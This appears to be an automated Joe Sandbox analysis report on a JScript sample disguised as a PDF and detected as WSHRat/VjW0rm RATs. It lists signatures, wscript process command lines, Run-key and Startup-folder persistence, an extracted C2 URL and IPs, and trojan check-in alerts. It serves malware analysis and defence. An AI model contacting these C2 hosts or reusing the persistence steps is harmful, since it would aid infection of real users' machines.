Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
34003198.pdf.js

Overview

General Information

Sample name:34003198.pdf.js
Analysis ID:1428759
MD5:6812d6fba47adabb337563ca20fa84f8
SHA1:2ab5b312c71f2a60d53c16fad7690291ea6d5bb0
SHA256:6ac96e55099f4737d755e8caa4a03a4ad47faec1e7d133c3eb67c9a7057cd574
Tags:jsVjw0rm
Infos:

Detection

WSHRat, VjW0rm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected WSHRat
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Sigma detected: Drops script at startup location
Sigma detected: Register Wscript In Run Key
Sigma detected: VjW0rm
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
Yara detected WSHRAT
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Drops script or batch files to the startup folder
Potential malicious VBS/JS script found (suspicious encoded strings)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Parent Double Extension File Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Uses an obfuscated file name to hide its real file extension (double extension)
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • wscript.exe (PID: 4108 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 2316 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 3168 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 3084 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 416 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 3052 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 5428 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 2108 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 5228 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 3396 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6540 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Houdini, WSHRATHoudini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.houdini
NameDescriptionAttributionBlogpost URLsLink
Vjw0rmVJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm
{"C2 url": "http://jemyy.theworkpc.com:5401/Vre"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_WSHRATYara detected WSHRATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
      0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
        00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
          00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
            00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
              Click to see the 32 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_4108.amsi.csvJoeSecurity_WSHRATYara detected WSHRATJoe Security
                amsi64_2316.amsi.csvJoeSecurity_VjW0rmYara detected VjW0rmJoe Security
                  amsi64_3168.amsi.csvJoeSecurity_WSHRATYara detected WSHRATJoe Security
                    amsi64_3084.amsi.csvJoeSecurity_VjW0rmYara detected VjW0rmJoe Security
                      amsi64_3052.amsi.csvJoeSecurity_WSHRATYara detected WSHRATJoe Security
                        Click to see the 4 entries

                        System Summary

                        barindex
                        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 109.248.151.106, DestinationIsIpv6: false, DestinationPort: 5401, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 2316, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                        Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js", CommandLine: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4108, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js", ProcessId: 2316, ProcessName: wscript.exe
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js", ProcessId: 4108, ProcessName: wscript.exe
                        Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 4108, TargetFilename: C:\Users\user\AppData\Roaming\bCdHGOcGLp.js
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 109.248.151.106, DestinationIsIpv6: false, DestinationPort: 5401, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 2316, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 2316, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js", ProcessId: 4108, ProcessName: wscript.exe

                        Data Obfuscation

                        barindex
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 4108, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js

                        Persistence and Installation Behavior

                        barindex
                        Source: Registry Key setAuthor: Joe Security: Data: Details: wscript.exe //B "C:\Users\user\AppData\Roaming\34003198.pdf.js", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 4108, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\34003198
                        Source: Registry Key setAuthor: Joe Security: Data: Details: FALSE, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 2316, TargetObject: HKEY_CURRENT_USER\vjw0rm
                        Timestamp:04/19/24-15:28:38.781042
                        SID:2017516
                        Source Port:49751
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:56.289406
                        SID:2017516
                        Source Port:49758
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:02.102084
                        SID:2017516
                        Source Port:49761
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:44.611333
                        SID:2017516
                        Source Port:49754
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:54.431929
                        SID:2017516
                        Source Port:49778
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:13.745654
                        SID:2017516
                        Source Port:49764
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:27:55.119296
                        SID:2017516
                        Source Port:49731
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:30.996857
                        SID:2017516
                        Source Port:49770
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:25.223069
                        SID:2017516
                        Source Port:49768
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:42.605649
                        SID:2017516
                        Source Port:49774
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:26.802190
                        SID:2017516
                        Source Port:49747
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:32.505545
                        SID:2017516
                        Source Port:49750
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:50.526021
                        SID:2017516
                        Source Port:49757
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:02.031122
                        SID:2017516
                        Source Port:49760
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:14.717719
                        SID:2828283
                        Source Port:49741
                        Destination Port:5401
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:20.993334
                        SID:2017516
                        Source Port:49744
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:07.984957
                        SID:2017516
                        Source Port:49763
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:13.842546
                        SID:2017516
                        Source Port:49740
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:19.753385
                        SID:2017516
                        Source Port:49767
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:49.028843
                        SID:2017516
                        Source Port:49777
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:37.267221
                        SID:2017516
                        Source Port:49773
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:19.504394
                        SID:2017516
                        Source Port:49766
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:27:55.840576
                        SID:2828283
                        Source Port:49732
                        Destination Port:5401
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:25.746753
                        SID:2828283
                        Source Port:49745
                        Destination Port:5401
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:26.640971
                        SID:2017516
                        Source Port:49746
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:50.417544
                        SID:2017516
                        Source Port:49756
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:36.802594
                        SID:2017516
                        Source Port:49772
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:07.909979
                        SID:2017516
                        Source Port:49762
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:20.524782
                        SID:2017516
                        Source Port:49743
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:26.838700
                        SID:2828283
                        Source Port:49748
                        Destination Port:5401
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:02.481379
                        SID:2017516
                        Source Port:49733
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:48.531470
                        SID:2017516
                        Source Port:49776
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:43.138963
                        SID:2017516
                        Source Port:49775
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:09.257217
                        SID:2017516
                        Source Port:49739
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:15.083134
                        SID:2017516
                        Source Port:49742
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:13.936452
                        SID:2017516
                        Source Port:49765
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:32.402481
                        SID:2017516
                        Source Port:49749
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:38.924678
                        SID:2017516
                        Source Port:49752
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:44.761206
                        SID:2017516
                        Source Port:49755
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:25.681174
                        SID:2017516
                        Source Port:49769
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:28:56.367338
                        SID:2017516
                        Source Port:49759
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:27:51.758515
                        SID:2828283
                        Source Port:49730
                        Destination Port:5401
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/19/24-15:29:31.465526
                        SID:2017516
                        Source Port:49771
                        Destination Port:1604
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: amsi64_2316.amsi.csvMalware Configuration Extractor: VjW0rm {"C2 url": "http://jemyy.theworkpc.com:5401/Vre"}
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49730 -> 109.248.151.106:5401
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49731 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49732 -> 109.248.151.106:5401
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49733 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49739 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49740 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49741 -> 109.248.151.106:5401
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49742 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49743 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49744 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49745 -> 109.248.151.106:5401
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49746 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49747 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49748 -> 109.248.151.106:5401
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49749 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49750 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49751 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49752 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49754 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49755 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49756 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49757 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49758 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49759 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49760 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49761 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49762 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49763 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49764 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49765 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49766 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49767 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49768 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49769 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49770 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49771 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49772 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49773 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49774 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49775 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49776 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49777 -> 94.156.71.108:1604
                        Source: TrafficSnort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49778 -> 94.156.71.108:1604
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 94.156.71.108 1604
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 109.248.151.106 5401Jump to behavior
                        Source: Malware configuration extractorURLs: http://jemyy.theworkpc.com:5401/Vre
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 5401
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 5401
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 5401
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 5401
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5401
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 1604
                        Source: global trafficTCP traffic: 192.168.2.4:49730 -> 109.248.151.106:5401
                        Source: global trafficTCP traffic: 192.168.2.4:49731 -> 94.156.71.108:1604
                        Source: Joe Sandbox ViewASN Name: TERASYST-ASBG TERASYST-ASBG
                        Source: Joe Sandbox ViewASN Name: DATACLUBLV DATACLUBLV
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
